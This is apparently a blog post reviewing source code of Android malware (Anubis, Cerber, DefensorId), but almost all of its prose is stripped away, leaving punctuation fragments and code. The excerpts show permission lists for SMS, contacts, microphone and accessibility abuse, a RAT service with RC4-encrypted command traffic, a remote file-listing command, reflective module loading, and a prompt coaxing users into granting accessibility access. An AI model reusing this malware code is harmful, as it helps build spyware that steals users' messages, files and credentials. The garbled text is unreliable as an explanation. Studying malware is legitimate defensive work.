. β , Android - , .
, . :
;
, ;
;
( ).
Disclamer: .
, Android Linux. , Android . , . :
;
SELinux ;
.
100% . ? β . , β Android Intent`, .
Android open source: , , «» . .
Anubis
: Java. , Java.
. AndroidManifest
:
...
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.GET_TASKS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.WRITE_SMS" />
<uses-permission
android:name="android.permission.PACKAGE_USAGE_STATS"
tools:ignore="ProtectedPermissions" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
...
, , 24/7 . , .
, . , "ServiceRAT". β . :
...
public class ServiceRAT extends IntentService {
String botid="";
UtilsClass utilsClass = new UtilsClass();
Constants const_ = new Constants();
RequestHttp http = new RequestHttp();
StoreStringClass storeStringClass = new StoreStringClass();
...
, http , «» RC4. code style, , . β :
...
UtilsClass utilsClass = new UtilsClass();
try
{
byte[] data = Base64.decode(textDE_C, Base64.DEFAULT);
textDE_C = new String(data, "UTF-8");
byte[] detext = utilsClass.hexStringToByteArray(textDE_C);
ClassRC4 rcd = new ClassRC4(key.getBytes());
return new String(rcd.decrypt(detext));
...
, :
...
responce = utilsClass.trafDeCr(responce);
utilsClass.Log("RATresponce",""+responce);
if(responce!="**"){
utilsClass.Log("RAT_command", "" + responce);
if(responce.contains("opendir:")){
String opendir = responce.replace("opendir:","");
opendir = opendir.split("!!!!")[0];
if(opendir.contains("getExternalStorageDirectory"))opendir = Environment.getExternalStorageDirectory().getAbsolutePath();
String getFileFolder = utilsClass.listFilesWithSubFolders(new File(opendir));
...
, 100% , 100% . opendir
.
: «» . , . . code style.
Cerber
, . . : , . , , , Google Play, .
: Java. :
...
<application
android:allowBackup="true"
android:label="module"
android:supportsRtl="true"
android:theme="@android:style/Theme.Translucent.NoTitleBar">
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.app.role.SMS" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
...
, Intent. :
...
import java.lang.reflect.Method;
public class MainActivity extends Activity {
mod tt = new mod();
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
tt.checkProtect(this);
try {
Class c = Class.forName("com.example.modulebot.MainActivity");
Method m = c.getMethod("ssss");
m.invoke(c.newInstance());
} catch (Throwable t) {
}
tt.main(this,"");
}
...
, . "tt
". , . , .
, :
...
case "updateModule":
utl.SettingsWrite(context, "statDownloadModule", "0");
try {
new File(context.getDir("apk", Context.MODE_PRIVATE), "system.apk").delete();
}catch (Exception ex){
utl.SettingsToAdd(context, consts.LogSMS , "(MOD5) | updateModule " + ex.toString() +"::endLog::");
}
....
"system.apk", , , . . , , .
: , . code style.
DefensorId
, Android. . β Java, Kotlin.
:
...
<uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW" />
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE"
tools:ignore="ProtectedPermissions" />
<uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"
tools:ignore="ProtectedPermissions" />
<service
android:name=".CoreService"
android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
...
, . Android , β Β« Β» (ACCESSIBILITY). , Intent :
...
public void overayPermission(){
if (!Settings.canDrawOverlays(this)) {
Intent myIntent = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION);
startActivityForResult(myIntent, WIN_REQ_CODE);
}
}
public void AccessibilityAllow() {
AlertDialog.Builder gsDialog = new AlertDialog.Builder(this);
gsDialog.setTitle("Message");
gsDialog.setCancelable(false);
gsDialog.setMessage("please need to allow the permission");
gsDialog.setPositiveButton("OK", new DialogInterface.OnClickListener() {
public void onClick(DialogInterface dialog, int which) {
startActivityForResult(new Intent(Settings.ACTION_ACCESSIBILITY_SETTINGS),CORE_REQ_CODE);
}
}).create().show();
}
...
. Intent β . . , .
: , . .
Android. , , , . , , Β« Β». Β« Β» β .
β .
"Android Developer. Basic" "Android Developer. Professional".
Β« AndroidΒ». c :
β ;
β Canvas, Path, Paint;
β .
!